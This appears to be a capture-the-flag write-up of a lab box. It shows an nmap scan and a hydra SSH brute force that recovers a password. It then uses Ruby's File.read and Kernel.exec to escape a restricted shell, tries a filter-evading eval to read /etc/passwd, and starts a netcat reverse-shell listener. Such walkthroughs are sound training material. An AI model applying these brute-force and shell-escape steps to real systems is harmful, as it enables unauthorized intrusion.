# Nmap 7.91 scan initiated Tue Mar 16 00:20:19 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.159.98 Nmap scan report for 10.10.159.98 Host is up (0.033s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ce:c9:85:e6:cf:67:5e:29:6a:49:af:4c:fc:49:b2:77 (RSA) | 256 4b:17:69:52:57:24:50:b9:ff:4e:45:75:81:8f:97:12 (ECDSA) |_ 256 67:82:c7:94:d9:da:29:bf:9a:44:41:bf:8c:35:21:f7 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Mar 16 00:20:53 2021 -- 1 IP address (1 host up) scanned in 34.24 seconds
Let's prepare a wordlist of password containing bu.
1
$ grep bu /usr/share/wordlists/passwords/rockyou.txt > /tmp/bu_wordlist.tx
Let's try SSH bruteforce with hydra and our custom wordlist.
1 2 3 4 5 6 7 8 9 10 11 12 13
$ hydra -l noraj -P /tmp/bu_wordlist.txt 10.10.159.98 -t 4 ssh Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-16 00:45:57 [DATA] max 4 tasks per 1 server, overall 4 tasks, 126338 login tries (l:1/p:126338), ~31585 tries per task [DATA] attacking ssh://10.10.159.98:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 126294 to do in 47:51h, 4 active [STATUS] 32.00 tries/min, 96 tries in 00:03h, 126242 to do in 65:46h, 4 active [22][ssh] host: 10.10.159.98 login: noraj password: cheeseburger [STATUS] 18048.29 tries/min, 126338 tries in 00:07h, 1 to do in 00:01h, 2 active 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-16 00:53:13
The method will allow use to transform a string into a Ruby object so we could
execute code. We have the choice of the Class, class method and one argument.
We could use:
Class: File
class method: read()
argument: /home/noraj/user.txt
This is convenient to get the first flag we in the end we need to escape the
restricted shell so better find a command execution payload.
Class: Kernel
class method: exec()
argument: /bin/zsh
Let's use this and then set a PATH to be able to load commands:
red-stone-one-carat% ls -lhA total 64K drwxr-xr-x 2 root root 4.0K Mar 15 19:38 bin drwx------ 2 noraj noraj 4.0K Mar 15 23:52 .cache -rw-r--r-- 1 vagrant vagrant 36 Mar 15 19:37 .hint.txt -rw-r--r-- 1 vagrant vagrant 37 Mar 15 19:37 user.txt -rw-r--r-- 1 noraj noraj 42K Mar 15 19:44 .zcompdump -rw-r--r-- 1 vagrant vagrant 20 Mar 15 19:37 .zshrc
red-stone-one-carat% ruby -e "puts File.read('.hint.txt')" Maybe take a look at local services.
Ok so let's see what network services are listening.
Again common network tools are forbidden and there is no bypass this time:
1 2 3 4
red-stone-one-carat% ss -nlpt zsh: permission denied: ss red-stone-one-carat% netstat -nlpt zsh: permission denied: netstat
As the goal of the box is to use Ruby there must be a way to implement an
equivalent in Ruby.
This can be done by parsing /proc/net/tcp where IP addresses are hex encoded
with low nibble first for many services it can be very time consuming to do
it manually so let's script it in Ruby.
Port 31547 service is owned by root so that must be the way.
1 2 3
vagrant@red-stone-one-carat:~$ nc 127.0.0.1 31547 $ id undefined local variable or method `id' for main:Object
it's not a shell but seems to be a Ruby eval pseudo shell.
1 2
$ File.read('/etc/passwd') Forbidden character
Looks like many special character like dot, quotes, braces, etc. are forbidden.
Taking a look at this SO thread
again we can find a way to execute commands without using a blocked character
using %x and curly braces {} rather than normal () or square braces [].
Also we can replace 127.0.0.1 that is using dots but localhost.
We can start another SSH session with a netcat listener nc -nlp 9999 and
open a reverse shell: